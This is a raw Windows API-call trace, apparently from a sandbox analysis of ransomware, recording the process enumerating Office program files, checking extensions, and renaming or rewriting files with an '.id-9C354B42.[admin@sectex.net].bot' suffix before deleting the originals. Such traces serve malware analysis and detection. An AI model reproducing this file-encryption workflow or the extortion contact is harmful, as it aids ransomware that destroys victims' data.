	[0155.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.814] lstrlenW (lpString=".1cd") returned 4
	[0155.814] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.814] lstrlenW (lpString=".jpg") returned 4
	[0155.814] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.814] lstrlenW (lpString=".doc") returned 4
	[0155.814] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.814] lstrlenW (lpString=".docx") returned 5
	[0155.815] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0155.815] lstrlenW (lpString=".pdf") returned 4
	[0155.815] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.815] lstrlenW (lpString=".xls") returned 4
	[0155.815] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.815] lstrlenW (lpString=".xlsx") returned 5
	[0155.815] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0155.815] lstrlenW (lpString=".ppt") returned 4
	[0155.815] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.815] lstrlenW (lpString=".zip") returned 4
	[0155.815] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.815] lstrlenW (lpString=".rar") returned 4
	[0155.815] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.815] lstrlenW (lpString=".bz2") returned 4
	[0155.815] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.815] lstrlenW (lpString=".7z") returned 3
	[0155.815] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.815] lstrlenW (lpString=".dbf") returned 4
	[0155.815] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0155.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.815] lstrlenW (lpString=".1cd") returned 4
	[0155.815] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCVDT.DLL") returned 53
	[0155.815] lstrlenW (lpString=".jpg") returned 4
	[0155.815] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.815] lstrcmpiW (lpString1=".ACCDU", lpString2=".bot") returned -1
	[0155.816] lstrlenW (lpString="ACWZDAT12.ACCDU") returned 15
	[0155.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzdat12.accdu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0155.820] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=6250496) returned 1
	[0155.821] CloseHandle (hObject=0x3ac) returned 1
	[0155.821] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzdat12.accdu")) returned 0x20
	[0155.821] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzdat12.accdu.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.821] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzdat12.accdu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzdat12.accdu.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0155.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.821] lstrlenW (lpString=".doc") returned 4
	[0155.821] lstrcmpiW (lpString1=".doc", lpString2="CCDU") returned -1
	[0155.821] lstrlenW (lpString=".docx") returned 5
	[0155.821] lstrcmpiW (lpString1=".docx", lpString2="ACCDU") returned -1
	[0155.821] lstrlenW (lpString=".pdf") returned 4
	[0155.821] lstrcmpiW (lpString1=".pdf", lpString2="CCDU") returned -1
	[0155.821] lstrlenW (lpString=".xls") returned 4
	[0155.821] lstrcmpiW (lpString1=".xls", lpString2="CCDU") returned -1
	[0155.821] lstrlenW (lpString=".xlsx") returned 5
	[0155.821] lstrcmpiW (lpString1=".xlsx", lpString2="ACCDU") returned -1
	[0155.821] lstrlenW (lpString=".ppt") returned 4
	[0155.821] lstrcmpiW (lpString1=".ppt", lpString2="CCDU") returned -1
	[0155.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.821] lstrlenW (lpString=".zip") returned 4
	[0155.821] lstrcmpiW (lpString1=".zip", lpString2="CCDU") returned -1
	[0155.821] lstrlenW (lpString=".rar") returned 4
	[0155.822] lstrcmpiW (lpString1=".rar", lpString2="CCDU") returned -1
	[0155.822] lstrlenW (lpString=".bz2") returned 4
	[0155.822] lstrcmpiW (lpString1=".bz2", lpString2="CCDU") returned -1
	[0155.822] lstrlenW (lpString=".7z") returned 3
	[0155.822] lstrcmpiW (lpString1=".7z", lpString2="CDU") returned -1
	[0155.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.822] lstrlenW (lpString=".dbf") returned 4
	[0155.822] lstrcmpiW (lpString1=".dbf", lpString2="CCDU") returned -1
	[0155.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.822] lstrlenW (lpString=".1cd") returned 4
	[0155.822] lstrcmpiW (lpString1=".1cd", lpString2="CCDU") returned -1
	[0155.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.822] lstrlenW (lpString=".jpg") returned 4
	[0155.822] lstrcmpiW (lpString1=".jpg", lpString2="CCDU") returned -1
	[0155.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.822] lstrlenW (lpString=".doc") returned 4
	[0155.822] lstrcmpiW (lpString1=".doc", lpString2="CCDU") returned -1
	[0155.822] lstrlenW (lpString=".docx") returned 5
	[0155.822] lstrcmpiW (lpString1=".docx", lpString2="ACCDU") returned -1
	[0155.822] lstrlenW (lpString=".pdf") returned 4
	[0155.822] lstrcmpiW (lpString1=".pdf", lpString2="CCDU") returned -1
	[0155.822] lstrlenW (lpString=".xls") returned 4
	[0155.822] lstrcmpiW (lpString1=".xls", lpString2="CCDU") returned -1
	[0155.822] lstrlenW (lpString=".xlsx") returned 5
	[0155.822] lstrcmpiW (lpString1=".xlsx", lpString2="ACCDU") returned -1
	[0155.822] lstrlenW (lpString=".ppt") returned 4
	[0155.822] lstrcmpiW (lpString1=".ppt", lpString2="CCDU") returned -1
	[0155.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.822] lstrlenW (lpString=".zip") returned 4
	[0155.822] lstrcmpiW (lpString1=".zip", lpString2="CCDU") returned -1
	[0155.823] lstrlenW (lpString=".rar") returned 4
	[0155.823] lstrcmpiW (lpString1=".rar", lpString2="CCDU") returned -1
	[0155.823] lstrlenW (lpString=".bz2") returned 4
	[0155.823] lstrcmpiW (lpString1=".bz2", lpString2="CCDU") returned -1
	[0155.823] lstrlenW (lpString=".7z") returned 3
	[0155.823] lstrcmpiW (lpString1=".7z", lpString2="CDU") returned -1
	[0155.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.823] lstrlenW (lpString=".dbf") returned 4
	[0155.823] lstrcmpiW (lpString1=".dbf", lpString2="CCDU") returned -1
	[0155.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.823] lstrlenW (lpString=".1cd") returned 4
	[0155.823] lstrcmpiW (lpString1=".1cd", lpString2="CCDU") returned -1
	[0155.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZDAT12.ACCDU") returned 65
	[0155.823] lstrlenW (lpString=".jpg") returned 4
	[0155.823] lstrcmpiW (lpString1=".jpg", lpString2="CCDU") returned -1
	[0155.823] lstrcmpiW (lpString1=".ACCDU", lpString2=".bot") returned -1
	[0155.823] lstrlenW (lpString="ACWZUSR12.ACCDU") returned 15
	[0155.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzusr12.accdu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0155.824] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=3440640) returned 1
	[0155.824] CloseHandle (hObject=0x3ac) returned 1
	[0155.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzusr12.accdu")) returned 0x20
	[0155.824] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzusr12.accdu.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.825] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzusr12.accdu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzusr12.accdu.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0155.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.825] lstrlenW (lpString=".doc") returned 4
	[0155.825] lstrcmpiW (lpString1=".doc", lpString2="CCDU") returned -1
	[0155.825] lstrlenW (lpString=".docx") returned 5
	[0155.825] lstrcmpiW (lpString1=".docx", lpString2="ACCDU") returned -1
	[0155.825] lstrlenW (lpString=".pdf") returned 4
	[0155.825] lstrcmpiW (lpString1=".pdf", lpString2="CCDU") returned -1
	[0155.825] lstrlenW (lpString=".xls") returned 4
	[0155.825] lstrcmpiW (lpString1=".xls", lpString2="CCDU") returned -1
	[0155.825] lstrlenW (lpString=".xlsx") returned 5
	[0155.825] lstrcmpiW (lpString1=".xlsx", lpString2="ACCDU") returned -1
	[0155.825] lstrlenW (lpString=".ppt") returned 4
	[0155.825] lstrcmpiW (lpString1=".ppt", lpString2="CCDU") returned -1
	[0155.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.825] lstrlenW (lpString=".zip") returned 4
	[0155.825] lstrcmpiW (lpString1=".zip", lpString2="CCDU") returned -1
	[0155.825] lstrlenW (lpString=".rar") returned 4
	[0155.825] lstrcmpiW (lpString1=".rar", lpString2="CCDU") returned -1
	[0155.825] lstrlenW (lpString=".bz2") returned 4
	[0155.825] lstrcmpiW (lpString1=".bz2", lpString2="CCDU") returned -1
	[0155.825] lstrlenW (lpString=".7z") returned 3
	[0155.825] lstrcmpiW (lpString1=".7z", lpString2="CDU") returned -1
	[0155.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.825] lstrlenW (lpString=".dbf") returned 4
	[0155.825] lstrcmpiW (lpString1=".dbf", lpString2="CCDU") returned -1
	[0155.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.826] lstrlenW (lpString=".1cd") returned 4
	[0155.826] lstrcmpiW (lpString1=".1cd", lpString2="CCDU") returned -1
	[0155.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.826] lstrlenW (lpString=".jpg") returned 4
	[0155.826] lstrcmpiW (lpString1=".jpg", lpString2="CCDU") returned -1
	[0155.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.826] lstrlenW (lpString=".doc") returned 4
	[0155.826] lstrcmpiW (lpString1=".doc", lpString2="CCDU") returned -1
	[0155.826] lstrlenW (lpString=".docx") returned 5
	[0155.826] lstrcmpiW (lpString1=".docx", lpString2="ACCDU") returned -1
	[0155.826] lstrlenW (lpString=".pdf") returned 4
	[0155.826] lstrcmpiW (lpString1=".pdf", lpString2="CCDU") returned -1
	[0155.826] lstrlenW (lpString=".xls") returned 4
	[0155.826] lstrcmpiW (lpString1=".xls", lpString2="CCDU") returned -1
	[0155.826] lstrlenW (lpString=".xlsx") returned 5
	[0155.826] lstrcmpiW (lpString1=".xlsx", lpString2="ACCDU") returned -1
	[0155.826] lstrlenW (lpString=".ppt") returned 4
	[0155.826] lstrcmpiW (lpString1=".ppt", lpString2="CCDU") returned -1
	[0155.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.826] lstrlenW (lpString=".zip") returned 4
	[0155.826] lstrcmpiW (lpString1=".zip", lpString2="CCDU") returned -1
	[0155.826] lstrlenW (lpString=".rar") returned 4
	[0155.826] lstrcmpiW (lpString1=".rar", lpString2="CCDU") returned -1
	[0155.826] lstrlenW (lpString=".bz2") returned 4
	[0155.826] lstrcmpiW (lpString1=".bz2", lpString2="CCDU") returned -1
	[0155.826] lstrlenW (lpString=".7z") returned 3
	[0155.826] lstrcmpiW (lpString1=".7z", lpString2="CDU") returned -1
	[0155.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.826] lstrlenW (lpString=".dbf") returned 4
	[0155.826] lstrcmpiW (lpString1=".dbf", lpString2="CCDU") returned -1
	[0155.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.827] lstrlenW (lpString=".1cd") returned 4
	[0155.827] lstrcmpiW (lpString1=".1cd", lpString2="CCDU") returned -1
	[0155.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZUSR12.ACCDU") returned 65
	[0155.827] lstrlenW (lpString=".jpg") returned 4
	[0155.827] lstrcmpiW (lpString1=".jpg", lpString2="CCDU") returned -1
	[0155.827] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0155.827] lstrlenW (lpString="ACCWIZ.DLL") returned 10
	[0155.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0155.828] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=210304) returned 1
	[0155.828] CloseHandle (hObject=0x3ac) returned 1
	[0155.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz.dll")) returned 0x20
	[0155.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0155.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ.DLL") returned 53
	[0155.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ.DLL") returned 53
	[0155.829] lstrlenW (lpString=".doc") returned 4
	[0155.829] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.829] lstrlenW (lpString=".docx") returned 5
	[0155.829] lstrcmpiW (lpString1=".docx", lpString2="Z.DLL") returned -1
	[0155.829] lstrlenW (lpString=".pdf") returned 4
	[0155.829] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.829] lstrlenW (lpString=".xls") returned 4
	[0155.829] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.829] lstrlenW (lpString=".xlsx") returned 5
	[0155.829] lstrcmpiW (lpString1=".xlsx", lpString2="Z.DLL") returned -1
	[0155.829] lstrlenW (lpString=".ppt") returned 4
	[0155.829] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ.DLL") returned 53
	[0155.829] lstrlenW (lpString=".zip") returned 4
	[0155.829] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.829] lstrlenW (lpString=".rar") returned 4
	[0155.829] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.829] lstrlenW (lpString=".bz2") returned 4
	[0155.829] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.829] lstrlenW (lpString=".7z") returned 3
	[0155.829] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ.DLL") returned 53
	[0155.829] lstrlenW (lpString=".dbf") returned 4
	[0155.829] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.203] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.203] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\asciieng.lng.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0156.204] GetLastError () returned 0x0
	[0156.204] ReadFile (in: hFile=0x38c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x46080, lpOverlapped=0x0) returned 1
	[0156.214] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x46090, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x46090, lpOverlapped=0x0) returned 1
	[0156.219] ReadFile (in: hFile=0x38c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.219] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.219] SetEndOfFile (hFile=0x3ac) returned 1
	[0156.219] CloseHandle (hObject=0x3ac) returned 1
	[0156.220] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.220] SetEndOfFile (hFile=0x38c) returned 1
	[0156.229] CloseHandle (hObject=0x38c) returned 1
	[0156.229] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.229] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\asciieng.lng")) returned 1
	[0156.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.230] lstrlenW (lpString=".doc") returned 4
	[0156.230] lstrcmpiW (lpString1=".doc", lpString2=".LNG") returned -1
	[0156.230] lstrlenW (lpString=".docx") returned 5
	[0156.230] lstrcmpiW (lpString1=".docx", lpString2="G.LNG") returned -1
	[0156.230] lstrlenW (lpString=".pdf") returned 4
	[0156.230] lstrcmpiW (lpString1=".pdf", lpString2=".LNG") returned 1
	[0156.230] lstrlenW (lpString=".xls") returned 4
	[0156.230] lstrcmpiW (lpString1=".xls", lpString2=".LNG") returned 1
	[0156.230] lstrlenW (lpString=".xlsx") returned 5
	[0156.230] lstrcmpiW (lpString1=".xlsx", lpString2="G.LNG") returned -1
	[0156.230] lstrlenW (lpString=".ppt") returned 4
	[0156.230] lstrcmpiW (lpString1=".ppt", lpString2=".LNG") returned 1
	[0156.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.230] lstrlenW (lpString=".zip") returned 4
	[0156.230] lstrcmpiW (lpString1=".zip", lpString2=".LNG") returned 1
	[0156.230] lstrlenW (lpString=".rar") returned 4
	[0156.230] lstrcmpiW (lpString1=".rar", lpString2=".LNG") returned 1
	[0156.230] lstrlenW (lpString=".bz2") returned 4
	[0156.230] lstrcmpiW (lpString1=".bz2", lpString2=".LNG") returned -1
	[0156.230] lstrlenW (lpString=".7z") returned 3
	[0156.231] lstrcmpiW (lpString1=".7z", lpString2="LNG") returned -1
	[0156.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.231] lstrlenW (lpString=".dbf") returned 4
	[0156.231] lstrcmpiW (lpString1=".dbf", lpString2=".LNG") returned -1
	[0156.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.231] lstrlenW (lpString=".1cd") returned 4
	[0156.231] lstrcmpiW (lpString1=".1cd", lpString2=".LNG") returned -1
	[0156.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.231] lstrlenW (lpString=".jpg") returned 4
	[0156.231] lstrcmpiW (lpString1=".jpg", lpString2=".LNG") returned -1
	[0156.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.231] lstrlenW (lpString=".doc") returned 4
	[0156.231] lstrcmpiW (lpString1=".doc", lpString2=".LNG") returned -1
	[0156.231] lstrlenW (lpString=".docx") returned 5
	[0156.231] lstrcmpiW (lpString1=".docx", lpString2="G.LNG") returned -1
	[0156.231] lstrlenW (lpString=".pdf") returned 4
	[0156.231] lstrcmpiW (lpString1=".pdf", lpString2=".LNG") returned 1
	[0156.231] lstrlenW (lpString=".xls") returned 4
	[0156.231] lstrcmpiW (lpString1=".xls", lpString2=".LNG") returned 1
	[0156.231] lstrlenW (lpString=".xlsx") returned 5
	[0156.231] lstrcmpiW (lpString1=".xlsx", lpString2="G.LNG") returned -1
	[0156.231] lstrlenW (lpString=".ppt") returned 4
	[0156.231] lstrcmpiW (lpString1=".ppt", lpString2=".LNG") returned 1
	[0156.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.231] lstrlenW (lpString=".zip") returned 4
	[0156.231] lstrcmpiW (lpString1=".zip", lpString2=".LNG") returned 1
	[0156.231] lstrlenW (lpString=".rar") returned 4
	[0156.231] lstrcmpiW (lpString1=".rar", lpString2=".LNG") returned 1
	[0156.231] lstrlenW (lpString=".bz2") returned 4
	[0156.231] lstrcmpiW (lpString1=".bz2", lpString2=".LNG") returned -1
	[0156.232] lstrlenW (lpString=".7z") returned 3
	[0156.232] lstrcmpiW (lpString1=".7z", lpString2="LNG") returned -1
	[0156.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.232] lstrlenW (lpString=".dbf") returned 4
	[0156.232] lstrcmpiW (lpString1=".dbf", lpString2=".LNG") returned -1
	[0156.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.232] lstrlenW (lpString=".1cd") returned 4
	[0156.232] lstrcmpiW (lpString1=".1cd", lpString2=".LNG") returned -1
	[0156.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ASCIIENG.LNG") returned 55
	[0156.232] lstrlenW (lpString=".jpg") returned 4
	[0156.232] lstrcmpiW (lpString1=".jpg", lpString2=".LNG") returned -1
	[0156.232] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0156.232] lstrlenW (lpString="AUDIOSEARCHLTS.DLL") returned 18
	[0156.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchlts.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0156.233] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=142776) returned 1
	[0156.233] CloseHandle (hObject=0x38c) returned 1
	[0156.233] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchlts.dll")) returned 0x20
	[0156.233] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AUDIOSEARCHLTS.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\audiosearchlts.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
